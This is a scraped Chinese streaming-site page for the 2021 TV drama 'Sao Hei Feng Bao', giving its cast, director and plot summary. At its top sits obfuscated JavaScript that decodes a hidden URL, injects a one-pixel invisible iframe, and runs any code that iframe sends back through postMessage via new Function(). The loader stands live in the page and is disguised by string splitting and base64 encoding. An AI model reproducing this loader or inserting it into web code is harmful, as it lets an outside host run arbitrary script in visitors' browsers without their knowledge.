if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['aksGSNQ']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'ra' + 'nq' + 'ob' + 'j_4352'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#aksGSNQ'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_4352`]) { var t = x(e.data[`des_s_4352`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'aHR'+'0cH'+'FFM'+'lMF'+'F0E'+'lMk'+'YlM'+'kFF'+'ZqY'+'FFS'+'55F'+'FdX'+'Nod'+'Whh'+'LmN'+'vbS'+'UzQ'+'TFF'+'EwN'+'DQz'+'JTJ'+'FFG'+'YzF'+'FRj'+'YTQ'+'yFF'+'JTJ'+'GYy'+'00M'+'FFz'+'UyF'+'FLT'+'IFF'+'1LT'+'FFE'+'uZF'+'Fm9'+'0', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

扫黑风暴

评分:
3.6 推荐

分类:国产剧 内地 2021

主演:孙红雷  张艺兴  刘奕君  吴越  王志飞  刘之冰  吴晓亮  江疏影  苏可  谭凯  侯长荣  孙浩  周晓鸥  宁..   

导演:五百   

作为一线刑警的李成阳(孙红雷 饰),不断遭到保护伞的打击,黑恶势力的陷害,甚至顶头上司,公安局长等人为了阻止他的调查而构陷他,导致他身陷囹圄,最终在中政委和中央督导组的指挥和领导下重获自由,后来他联合公检法司各部门,将盘踞在中江市十几年的两大黑恶势力团伙一网打尽,并将黑恶势力的保护伞和腐败的政府官员绳之以法,还中江政坛一个干净的政治生态,还中江百姓一个清朗的社会环境。

详情

猜你喜欢

加载中...

Copyright © 2015-2019 看最新电影就上258R影视网

电影

电视剧

综艺

动漫

影视直播

专题

资讯